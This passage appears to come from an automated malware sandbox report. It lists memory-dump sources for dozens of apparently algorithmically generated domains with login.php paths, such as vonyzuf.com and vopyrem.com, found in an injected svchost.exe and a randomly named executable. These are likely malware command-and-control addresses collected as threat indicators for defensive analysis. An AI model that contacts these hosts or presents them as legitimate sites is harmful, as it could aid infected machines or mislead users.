00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.0000000008682000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://volyqat.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyquk.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyrac.com/
Source: svchost.exe, 00000002.00000003.2637865779.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330574542.0000000003356000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2635608953.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://volyzef.com/login.php
Source: svchost.exe, 00000002.00000003.2331931532.0000000003331000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2529520220.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322986908.000000000332C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322419492.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2314870999.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2313143430.000000000332E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322727619.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322546634.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2521894791.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329969836.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2313145262.0000000003329000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2314873415.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2322755404.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybat.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonybuk.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328162774.0000000003315000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonycum.com/
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2760150538.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjef.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyjuc.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonykam.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.php
Source: svchost.exe, 00000002.00000003.2666875773.00000000040F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymoc.com/login.phpE
Source: svchost.exe, 00000002.00000003.2498726255.000000000085D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymuf.com/
Source: svchost.exe, 00000002.00000003.2513678339.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2311968303.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2542956129.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2310767470.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2513019694.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2499635923.0000000000855000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonymuf.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2365866545.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2852112632.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2373591398.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypic.com/login.php
Source: svchost.exe, 00000002.00000003.2385647048.0000000004061000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonypom.com/login.phpUUC:
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyqym.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2341852646.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356885542.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyrot.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2376002854.000000000923B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyryk.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335495212.00000000093E9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzac.com/login.php
Source: svchost.exe, 00000002.00000003.2397665900.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2414263063.00000000033CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388023341.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2425745567.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2422762232.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388405607.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2178331950.00000000008A3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2386784820.00000000033ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2385120826.00000000033EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2398171627.0000000000854000.00000004.00000020.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000006.00000002.2622033644.0000000008E90000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000007.00000002.2718258067.0000000008D8F000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2671362092.00000000086C1000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000009.00000002.2697302039.000000000899E000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093A5000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 0000000B.00000002.2745540362.00000000093CD000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.000000000914B000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000013.00000002.2756051050.0000000009104000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000015.00000002.2856769526.0000000008FC3000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2879717907.0000000008887000.00000004.00000001.00020000.00000000.sdmp, PMnAVsjMPucERAKEWNFImySCFHoLk.exe, 00000018.00000002.2901602167.0000000008BD5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://vonyzuf.com/login.php
Source: svchost.exe, 00000002.00000003.2885524752.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2379463124.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380581815.00000000092B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vonyzut.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612622918.0000000000854000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2631989272.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2575537635.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopybok.com/login.php
Source: svchost.exe, 00000002.00000003.2376137841.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2380222392.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2902106768.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopycoc.com/login.php
Source: svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2879404289.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2913582701.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyjac.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2693258532.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopykum.com/login.php
Source: svchost.exe, 00000002.00000003.2346403174.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346603921.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2346691543.00000000092BE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2349309789.00000000092C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopypec.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426541082.0000000009200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2905696441.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3426788667.0000000009235000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyput.com/login.php
Source: svchost.exe, 00000002.00000003.2726510414.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2729337658.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2360502034.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2746470521.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358968663.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2358089375.00000000092C8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363422290.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2359102012.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2363692365.00000000092C2000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2362592176.00000000092C1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2735954545.0000000003368000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyqef.com/login.php
Source: svchost.exe, 00000002.00000002.3428370692.00000000092EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2919185604.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3419128942.000000000336B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427392798.0000000009288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2925665962.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287645590.00000000092EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2927397659.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2381728153.00000000092E3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3287763223.00000000033C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928746848.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.3279511546.0000000003369000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3408110880.0000000000855000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2928459922.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3427876534.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2915948048.0000000009376000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.3428117276.00000000092CA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2916039850.0000000009374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrem.com/login.php
Source: svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667608142.00000000040FD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667040821.00000000040FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2356000937.00000000092BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyrik.com/login.php
Source: svchost.exe, 00000002.00000003.2649333466.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2678962210.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2657780583.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649747897.00000000040F5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2649350353.0000000000853000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2672508299.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347333934.0000000000851000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2647496494.00000000040F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2667583572.00000000092E5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2665259102.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2347614295.0000000000853000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vopyzot.com/login.php
Source: svchost.exe, 00000002.00000003.2329963433.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2328865580.0000000003315000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329926664.0000000003317000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2546812858.00000000040F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybof.com/
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2607855494.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2589419124.00000000033EA000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2609571355.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2553803750.00000000033EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowybof.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337365737.0000000003363000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337520424.0000000003368000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337073481.0000000003360000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2601374159.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336882213.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2571444797.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612862437.00000000092B7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092B6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092B8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2336470104.0000000003356000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowycut.com/login.php
Source: svchost.exe, 00000002.00000003.2337886081.00000000092C7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329364841.00000000092BD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2337007716.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2329971226.00000000092E4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2327922219.00000000092C0000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2330522610.00000000092C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2335731822.00000000092BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2547959760.00000000092E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowygem.com/login.php
Source: svchost.exe, 00000002.00000003.2757808782.0000000003319000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2809409371.00000000040ED000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2364207806.0000000000852000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2814428917.00000000040FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://vowyguf.com/login.php
